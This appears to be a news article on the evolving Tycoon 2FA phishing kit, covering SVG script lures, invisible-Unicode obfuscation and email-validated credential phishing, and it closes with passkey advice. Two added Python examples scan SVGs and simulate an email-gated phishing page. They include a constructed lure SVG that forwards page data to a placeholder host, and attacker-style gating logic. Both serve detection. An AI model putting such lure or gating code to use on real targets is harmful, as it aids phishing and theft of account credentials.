Update, April 15, 2025: This story, originally published April 13, has now been updated with details of how real-time email validation helps attackers, along with further information from Trustwave detailing how attackers obfuscate their 2FA bypass phishing threats.
I’m sorry to have to tell you this, but if you didn’t already realize it, you are under attack. No matter the operating system you use, the applications you rely upon or the faith you have in Big Tech to protect you, attackers are coming for your accounts and your data. The higher the profile of those accounts, the more valuable they are and the more scrutiny they get from hackers. Which is why we see security warnings about Apple ID attacks, X social media data leaks, and FBI advice on defending Android and iPhone smartphones. It is, however, Gmail and Microsoft accounts that hackers value most, for the data a successful account compromise can expose. News that an already perilous threat capable of bypassing the 2FA protections Google and Microsoft have in place is still evolving is, therefore, naturally of huge concern. Here’s what you need to know and what both tech giants say you must do right now.
The Evolution Of Tycoon 2FA
Tycoon 2FA is not a new threat, far from it, in fact. As I reported March 26, 2024, the adversary-in-the-middle attack kit first came to the attention of threat intelligence experts in 2023. In March 2024, however, the criminal developers behind it turned the threat dial up a notch or two by releasing an update that specifically targeted Microsoft 365 and Gmail account holders and employed advanced obfuscation and anti-detection capabilities.
Those attackers have, it seems, now turned the dial to 11.
New intelligence from security researchers at Trustwave has revealed even more sophisticated evasion techniques being deployed against Gmail and Microsoft users in the latest 2025 attacks. According to the new report’s authors, Trustwave’s Phil Hay and Rodel Mendrez, these include “using a custom CAPTCHA rendered via HTML5 canvas, invisible Unicode characters in obfuscated JavaScript, and anti-debugging scripts to thwart inspection.”
The researchers concede that none of these techniques is groundbreaking on its own, but combined they make detection and response markedly harder. Custom CAPTCHA visuals rendered in HTML5 canvas lend a phishing page an air of legitimacy, Unicode and proxy-based obfuscation delay detection, and anti-debugging behaviors hide malicious activity from automated analysis tools.
Another Trick Up The 2FA Bypass Phishing Threat Obfuscation Sleeve
Bernard Bautista and Kevin Adriano, also at Trustwave, have reported how threat actors are using harmless-looking images to hide what are actually dangerous links in phishing attacks, and they describe a “major spike” in this type of obfuscation.
The attacks exploit the fact that Scalable Vector Graphics image files are based on the Extensible Markup Language, unlike more typical image formats, which means they can contain interactive scripts. “SVG-based attacks have sharply pivoted toward phishing campaigns,” the report warned, “with a staggering 1800% increase in early 2025 compared to data collected since April 2024.” Notably, a large surge in such campaigns was observed during the first quarter of 2025, driven “largely by the emergence of Attack-in-the-Middle Phishing-as-a-Service platforms such as Tycoon2FA,” the researchers said.
SVG files are popularly, and perfectly legitimately, used in web design and branding campaigns due to their sharp image output, but the researchers warned that their ability to embed JavaScript introduces serious cybersecurity risks. Attackers use this to inject malicious scripts directly into the image files, which can then “execute automatically upon opening the file, enabling a wide range of cyberattacks, including unauthorized system access, data theft, identity compromise, and leakage of sensitive information.”
The problem, if it needs spelling out, is that these scripts can execute without any explicit user interaction, and they are harder for security tools to detect and block. Add to that the false sense of security people have about images, SVG files included, which are often treated as carrying no risk at all. One caveat worth knowing: a browser that renders an SVG as an image (for example via an img tag on a web page) does not run its script; the script fires when the file is opened directly as a document, which is exactly what happens when a recipient double-clicks an SVG attachment and it opens in a browser.
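To make the two obfuscation points above concrete (invisible Unicode characters hidden in Tycoon 2FA's obfuscated JavaScript, and script smuggled inside SVG "images"), here is an added example scanner in Python. It is not Trustwave's code or anything taken from the Tycoon 2FA kit; the two SVG documents it checks are constructed for this example, and login.example is a placeholder hostname.

```python
# Added example, not code from Trustwave or from the Tycoon 2FA kit: a scanner
# that walks an SVG as XML and flags anything that can run script (<script>,
# on* event handlers, javascript: URLs, <foreignObject>), and that counts
# invisible Unicode code points inside script text, the trick used to hide
# obfuscated JavaScript from casual inspection. Sample SVGs below are constructed.
import re
import unicodedata
import xml.etree.ElementTree as ET

# Characters that render as nothing but survive copy/paste and parsing.
# Unicode category Cf covers ZWSP, ZWJ, ZWNJ, soft hyphen, BOM and the tag
# characters; U+3164 and U+FFA0 (Hangul fillers) are category Lo but also
# draw nothing, so they are listed explicitly.
EXTRA_INVISIBLE = {"\u3164", "\uffa0"}
EVENT_ATTR = re.compile(r"^on[a-z]+$")
JS_URL = re.compile(r"^\s*javascript:", re.IGNORECASE)


def invisible_chars(text: str) -> list[str]:
    """Return every invisible code point in text (usable on any JS source)."""
    return [c for c in text if unicodedata.category(c) == "Cf" or c in EXTRA_INVISIBLE]


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix: '{ns}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means nothing executable."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag).lower()
        if tag == "script":
            findings.append("<script> element")
            hidden = invisible_chars(el.text or "")
            if hidden:
                findings.append(f"{len(hidden)} invisible Unicode chars in script")
        elif tag == "foreignobject":
            findings.append("<foreignObject> element (can wrap arbitrary HTML)")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if EVENT_ATTR.match(name):
                findings.append(f"event handler {name} on <{tag}>")
            if name == "href" and JS_URL.match(value):
                findings.append(f"javascript: URL on <{tag}>")
    return findings


def is_risky(data: bytes) -> bool:
    """True when the file contains anything a browser could execute."""
    return bool(scan_svg(data))


# Constructed samples. The first is an ordinary logo-style image; the second
# mimics the lure pattern: an onload handler, a script whose source is padded
# with zero-width spaces (U+200B), and a clickable link to a javascript: URL.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
    b'<circle cx="50" cy="50" r="40" fill="#0078d4"/></svg>'
)
LURE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">'
    '<script>var u=\u200b"https://login.example/"+\u200bdocument.location.hash;</script>'
    '<a xlink:href="javascript:window.location=u">'
    '<text x="10" y="20">Open secure document</text></a></svg>'
).encode("utf-8")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, "->", scan_svg(doc) or "no executable content")
```

Run it over SVG attachments at the mail gateway or in a sandbox; any finding at all is grounds to quarantine, because a legitimate logo never needs script, event handlers or javascript: links. The invisible_chars helper is independent of SVG and can be pointed at any JavaScript file pulled from a suspected Tycoon 2FA page.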
Precision-Validated Credential Theft In 2FA Attacks
Marie Mamaril, part of the Cofense Intelligence Team, has drawn attention to another spanner in the works for defenders trying to counter phishing attacks: precision-validated credential theft. This technique “leverages real-time email validation to ensure only high-value targets receive the phishing attempt,” Mamaril warned, before detailing why it is so advantageous from the attacker’s perspective. The reasons included:
- Real-time email validation increases attack efficiency and, because it improves the odds that stolen credentials belong to actively used accounts, also improves “the quality of harvested data for resale or further exploitation,” Mamaril said.
- The impact on cybersecurity and security operations center teams should not be ignored: once the technique is deployed, both are significantly hindered from completing any further analysis or investigation.
The key to the success of precision-validated phishing is hinted at in the name. Instead of taking a broad grapeshot approach to the task by distributing attack emails far and wide, precision-validated phishing operates in a highly selective fashion by only actually engaging with those email addresses that have already been “verified as active, legitimate, and often high-value.”
Mamaril explained this by detailing how an attacker will check every email address against a database of pre-collected and verified emails before the target credential phishing login form is displayed to the potential victim. “If the email address entered does not match any from the pre-collected list,” Mamaril said, “the phishing page either returns an error or redirects to a legitimate, benign-looking page, preventing security teams from doing further analysis and investigation.”
Indeed, this validation filter is so effective at shutting down investigation that automated crawlers and sandboxed environments also struggle to analyze these pages, because they simply cannot get past it. The end result, according to Mamaril, is reduced risk to the attacker and a longer lifespan for the phishing campaign. None of which is good news for the end user.
Ultimately, the report concludes that the selective nature of precision-validated phishing also makes detection through any kind of shared threat intelligence harder. “Since phishing pages do not serve malicious content to everyone,” Mamaril warned, “some traditional URL scanning tools may fail to flag them as threats.” The upshot is that traditional blocklisting is unlikely to help anyone, and defenders need to shift towards behavioral analysis and anomaly detection instead, “to identify phishing campaigns before they reach end users.”
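As an added illustration, and not Cofense's code or anything taken from a phishing kit, the following Python simulates the email gate described above and what a URL scanner sees when it hits it. The target list, the addresses and the page bodies are all constructed; storing the list as hashes rather than plaintext, and the differential_scan check at the end, are assumptions of this example rather than anything the report describes.

```python
# Added example, not code from Cofense or from any phishing kit: a simulation
# of the real-time email validation gate that precision-validated phishing
# puts in front of its credential form, plus two scanner behaviours against it.
# All addresses, page bodies and the target list are constructed for this
# example; hashing the list instead of storing plaintext is an assumption.
import hashlib

BENIGN_REDIRECT = "https://www.example.com/"  # stands in for a "legitimate, benign-looking page"
LOGIN_FORM = '<form id="login"><input name="email"><input name="password"></form>'


def _key(address: str) -> str:
    """Normalise then hash, so comparison ignores case and stray whitespace."""
    return hashlib.sha256(address.strip().lower().encode()).hexdigest()


class GatedPhishingPage:
    """Serves the credential form only to addresses on the pre-collected list."""

    def __init__(self, verified_targets):
        self._targets = {_key(a) for a in verified_targets}

    def respond(self, submitted_email: str) -> dict:
        if _key(submitted_email) in self._targets:
            return {"status": 200, "location": None, "body": LOGIN_FORM}
        # Everyone else, crawlers and sandboxes included, is bounced to a real site,
        # so the scanner never sees the credential form.
        return {"status": 302, "location": BENIGN_REDIRECT, "body": ""}


def naive_scan(page: GatedPhishingPage, probe_address: str) -> str:
    """What a content-based URL scanner does: submit a throwaway address, inspect."""
    response = page.respond(probe_address)
    return "malicious" if "<form" in response["body"] else "clean"


def differential_scan(page: GatedPhishingPage, recipient: str, control: str) -> str:
    """A behavioural check this example assumes (not from the report): replay the
    validation step with the lure's actual recipient address and with a control
    address. A page that answers the two differently is gating its content on
    who is asking, which is itself the anomaly worth flagging."""
    as_recipient = page.respond(recipient)
    as_control = page.respond(control)
    if as_recipient != as_control:
        return "suspicious: content varies by submitted address"
    return naive_scan(page, control)


if __name__ == "__main__":
    # Constructed target list and probe addresses.
    page = GatedPhishingPage(["cfo@victim.example", "payroll@victim.example"])
    print("sandbox probe:", naive_scan(page, "sandbox@scanner.example"))          # clean
    print("real target:", page.respond("cfo@victim.example")["status"])            # 200
    print("differential:", differential_scan(page, "cfo@victim.example", "sandbox@scanner.example"))
```

The naive scanner reports the page as clean because the only address it ever tries is its own, which is exactly the failure mode Mamaril describes. The differential check works only because a mail-security tool knows who the lure was sent to; it should be treated as one signal, since a legitimate site with per-user login flows can also answer different addresses differently.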
Do This To Protect Against 2FA Bypass Attacks Right Now
Trustwave recommended that security teams should “consider behavior-based monitoring, browser sandboxing, and a deeper inspection of JavaScript patterns” in order to stay one step ahead of the Tycoon 2FA attackers. Google and Microsoft, however, have some more straightforward advice for ordinary users when it comes to protecting themselves and their valuable accounts from the 2FA bypass hackers.
The simple truth is that, from the end user defensive posture perspective, the mitigation advice when it comes to Tycoon 2FA attacks is the same now as it was in 2024, namely, use passkeys.
A Google spokesperson said that “passkeys substantially reduce the impact of phishing and other social engineering attacks. Google research has shown that security keys provide a stronger protection against automated bots, bulk phishing attacks, and targeted attacks than SMS, app-based one-time passwords, and other forms of traditional two-factor authentication.”
Meanwhile, a Microsoft spokesperson said, “As a security best practice, we encourage customers to always practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers. In addition, we recommend switching to Passkeys wherever possible and using authentication apps such as Microsoft Authenticator, which warn users about potential phishing attempts.”
So, there you have it: use passkeys to protect your Gmail and Microsoft accounts, not only against this 2FA bypass attack but also against other potential threats. What are you waiting for, do it now.